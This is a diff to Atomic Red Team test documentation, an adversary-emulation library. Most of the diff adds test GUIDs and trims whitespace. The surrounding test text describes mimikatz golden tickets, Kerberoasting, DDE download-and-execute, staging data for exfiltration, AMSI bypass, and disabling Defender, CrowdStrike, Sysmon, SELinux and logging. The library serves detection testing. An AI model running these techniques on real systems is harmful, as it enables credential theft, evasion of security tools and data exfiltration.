## Atomic Test #1 - Crafting golden tickets with mimikatz + +auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af + Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | string | S-1-5-21-DEFAULT| | domain | Targeted domain FQDN | string | example.com| @@ -98,7 +100,7 @@ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index 3dee6b3b..c33a6ec5 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -18,13 +18,15 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets + +auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a + This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output - **Supported Platforms:** Windows diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md index 191c83d5..1e38d8cb 100644 --- a/atomics/T1559.002/T1559.002.md +++ b/atomics/T1559.002/T1559.002.md @@ -18,8 +18,10 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands -Executes commands via DDE using Microsfot Word +auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd + +Executes commands via DDE using Microsfot Word **Supported Platforms:** Windows @@ -48,8 +50,10 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE -When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script +auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 + +When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script **Supported Platforms:** Windows @@ -72,6 +76,9 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO + +auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 + TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ @@ -79,7 +86,6 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) - **Supported Platforms:** Windows diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index c5559b4f..17ca1c97 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -26,16 +26,18 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
## Atomic Test #1 - Compress Data for Exfiltration With Rar + +auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_path | Path that should be compressed into our output file | Path | %USERPROFILE%| | file_extension | Extension of files to compress | String | .txt| @@ -62,7 +64,7 @@ del /f /q /s #{output_file} >nul 2>&1 ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{rar_exe}" (exit /b 1) +if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -78,16 +80,18 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar + +auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c + Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rar_installer | Winrar installer | Path | %TEMP%\winrar.exe| | rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe| @@ -111,7 +115,7 @@ dir ##### Description: Rar tool must be installed at specified location (#{rar_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{rar_exe}" (exit /b 1) +if not exist "#{rar_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -127,16 +131,18 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip + +auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 + Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe| | winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe| @@ -162,7 +168,7 @@ dir ##### Description: Winzip must be installed ##### Check Prereq Commands: ```powershell -cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' +cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` ##### Get Prereq Commands: ```powershell @@ -179,15 +185,17 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip -Note: Requires 7zip installation +auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 + +Note: Requires 7zip installation **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | 7zip_installer | 7zip installer | Path | %TEMP%\7zip.exe| | 7zip_exe | Path to installed 7zip executable | Path | %ProgramFiles%\7-zip\7z.exe| @@ -211,7 +219,7 @@ dir ##### Description: 7zip tool must be installed at specified location (#{7zip_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{7zip_exe}" (exit /b 1) +if not exist "#{7zip_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -227,15 +235,17 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
## Atomic Test #5 - Data Compressed - nix - zip -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. +auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt| | output_file | Path that should be output as a zip archive | Path | $HOME/data.zip| @@ -259,7 +269,7 @@ rm -f #{output_file} ##### Description: Files to zip must exist (#{input_files}) ##### Check Prereq Commands: ```sh -if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; +if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -273,15 +283,17 @@ echo Please set input_files argument to include files that exist
## Atomic Test #6 - Data Compressed - nix - gzip Single File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. +auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt| | input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101| @@ -307,15 +319,17 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. +auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a + +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME| | output_file | File that should be output | Path | $HOME/data.tar.gz| @@ -339,7 +353,7 @@ rm -f #{output_file} ##### Description: Folder to zip must exist (#{input_file_folder}) ##### Check Prereq Commands: ```sh -test -e #{input_file_folder} +test -e #{input_file_folder} ``` ##### Get Prereq Commands: ```sh @@ -353,15 +367,17 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric -Encrypt data for exiltration +auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f + +Encrypt data for exiltration **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_folder | Path used to store files. | Path | /tmp/T1560| | test_file | Temp file used to store encrypted data. | Path | T1560| @@ -390,7 +406,7 @@ rm -Rf #{test_folder} ##### Description: gpg and zip are required to run the test. ##### Check Prereq Commands: ```sh -if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; +if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md index 4265891a..8cd45ba7 100644 --- a/atomics/T1560.002/T1560.002.md +++ b/atomics/T1560.002/T1560.002.md @@ -18,15 +18,17 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux) -Uses GZip from Python to compress files +auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 + +Uses GZip from Python to compress files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd| | path_to_output_file | Path of the file that you want your .gz file to be | Path | /tmp/passwd.gz| @@ -50,7 +52,7 @@ rm #{path_to_output_file} ##### Description: Requires Python ##### Check Prereq Commands: ```bash -which_python=`which python`; $which_python -V +which_python=`which python`; $which_python -V ``` ##### Get Prereq Commands: ```bash @@ -64,15 +66,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux) -Uses bz2 from Python to compress files +auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d + +Uses bz2 from Python to compress files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd| | path_to_output_file | Path of the file that you want your .bz2 file to be | Path | /tmp/passwd.bz2| @@ -96,7 +100,7 @@ rm #{path_to_output_file} ##### Description: Requires Python ##### Check Prereq Commands: ```bash -which_python=`which python`; $which_python -V +which_python=`which python`; $which_python -V ``` ##### Get Prereq Commands: ```bash @@ -110,15 +114,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux) -Uses zipfile from Python to compress files +auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 + +Uses zipfile from Python to compress files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd| | path_to_output_file | Path of the file that you want your .zip file to be | Path | /tmp/passwd.zip| @@ -142,7 +148,7 @@ rm #{path_to_output_file} ##### Description: Requires Python ##### Check Prereq Commands: ```bash -which_python=`which python`; $which_python -V +which_python=`which python`; $which_python -V ``` ##### Get Prereq Commands: ```bash @@ -156,15 +162,17 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux) -Uses tarfile from Python to compress files +auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db + +Uses tarfile from Python to compress files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd| | path_to_output_file | Path of the file that you want your .tar.gz file to be | Path | /tmp/passwd.tar.gz| @@ -188,7 +196,7 @@ rm #{path_to_output_file} ##### Description: Requires Python ##### Check Prereq Commands: ```bash -which_python=`which python`; $which_python -V +which_python=`which python`; $which_python -V ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md index 4ef9d90f..7c1e6f91 100644 --- a/atomics/T1560/T1560.md +++ b/atomics/T1560/T1560.md @@ -12,16 +12,18 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell + +auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE| | output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\T1560-data-ps.zip| diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index c3e7e8bc..4681b94f 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1562.001/T1562.001.md @@ -56,15 +56,17 @@
## Atomic Test #1 - Disable syslog -Disables syslog collection +auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 + +Disables syslog collection **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | package_checker | Package checking command for linux. Default rpm | string | rpm -q rsyslog| | package_installer | Package installer command for linux. Default yum | string | yum install -y rsyslog| @@ -90,7 +92,7 @@ Disables syslog collection ##### Description: Package with rsyslog must be on system ##### Check Prereq Commands: ```sh -if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```sh @@ -104,8 +106,10 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response -Disable the Cb Response service +auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 + +Disable the Cb Response service **Supported Platforms:** Linux @@ -135,8 +139,10 @@ fi
## Atomic Test #3 - Disable SELinux -Disables SELinux enforcement +auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 + +Disables SELinux enforcement **Supported Platforms:** Linux @@ -163,8 +169,10 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux -Stop and disable Crowdstrike Falcon on Linux +auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d + +Stop and disable Crowdstrike Falcon on Linux **Supported Platforms:** Linux @@ -193,8 +201,10 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response -Disables Carbon Black Response +auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c + +Disables Carbon Black Response **Supported Platforms:** macOS @@ -223,8 +233,10 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch -Disables LittleSnitch +auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 + +Disables LittleSnitch **Supported Platforms:** macOS @@ -251,8 +263,10 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella -Disables OpenDNS Umbrella +auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 + +Disables OpenDNS Umbrella **Supported Platforms:** macOS @@ -279,8 +293,10 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper -Disables macOS Gatekeeper +auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 + +Disables macOS Gatekeeper **Supported Platforms:** macOS @@ -307,15 +323,17 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS -Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS +auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef + +Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist| | userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist| @@ -343,16 +361,18 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver + +auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164 + Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv| @@ -378,7 +398,7 @@ sysmon -i -accepteula -i > nul 2>&1 ##### Description: Sysmon must be downloaded ##### Check Prereq Commands: ```powershell -if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } +if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -389,7 +409,7 @@ Remove-Item $env:TEMP\Sysmon.zip -Force ##### Description: sysmon must be Installed ##### Check Prereq Commands: ```powershell -if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } +if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -399,7 +419,7 @@ if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Window ##### Description: sysmon filter must be loaded ##### Check Prereq Commands: ```powershell -if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } +if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -414,15 +434,17 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon -Uninstall Sysinternals Sysmon for Defense Evasion +auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc + +Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe| @@ -445,7 +467,7 @@ sysmon -i -accepteula >nul 2>&1 ##### Description: Sysmon executable must be available ##### Check Prereq Commands: ```powershell -if(cmd /c where sysmon) {exit 0} else {exit 1} +if(cmd /c where sysmon) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -458,7 +480,7 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} ##### Description: Sysmon must be installed ##### Check Prereq Commands: ```powershell -if(cmd /c sc query sysmon) { exit 0} else { exit 1} +if(cmd /c sc query sysmon) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -472,11 +494,13 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed + +auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd + Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ - **Supported Platforms:** Windows @@ -503,10 +527,12 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key + +auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b + With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. - **Supported Platforms:** Windows @@ -533,17 +559,19 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service + +auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5 + With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | The name of the service to stop | String | McAfeeDLPAgentService| @@ -570,9 +598,11 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell + +auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7 + Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. - **Supported Platforms:** Windows @@ -605,10 +635,12 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #16 - Tamper with Windows Defender Command Prompt + +auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2 + Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. - **Supported Platforms:** Windows @@ -638,9 +670,11 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry + +auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 + Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. - **Supported Platforms:** Windows @@ -667,12 +701,14 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features + +auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 + Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - **Supported Platforms:** Windows @@ -706,12 +742,14 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files + +auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 + Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - **Supported Platforms:** Windows @@ -734,15 +772,17 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service -Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. +auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143 + +Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | The name of the service to remove | String | McAfeeDLPAgentService| @@ -764,15 +804,17 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows -Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. +auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 + +Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe| @@ -793,17 +835,19 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder + +auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed + Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | excluded_folder | This folder will be excluded from scanning | String | C:\Temp| @@ -830,17 +874,19 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension + +auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea + Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | excluded_exts | A list of extension to exclude from scanning | string | .exe| @@ -867,17 +913,19 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process + +auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27 + Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess." - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | excluded_process | A list of processes to exclude from scanning | string | outlook.exe| diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 1ca11b6f..01ba57e2 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -18,18 +18,20 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging + +auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db + Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | website_name | The name of the website on a server | string | Default Web Site| @@ -56,8 +58,10 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
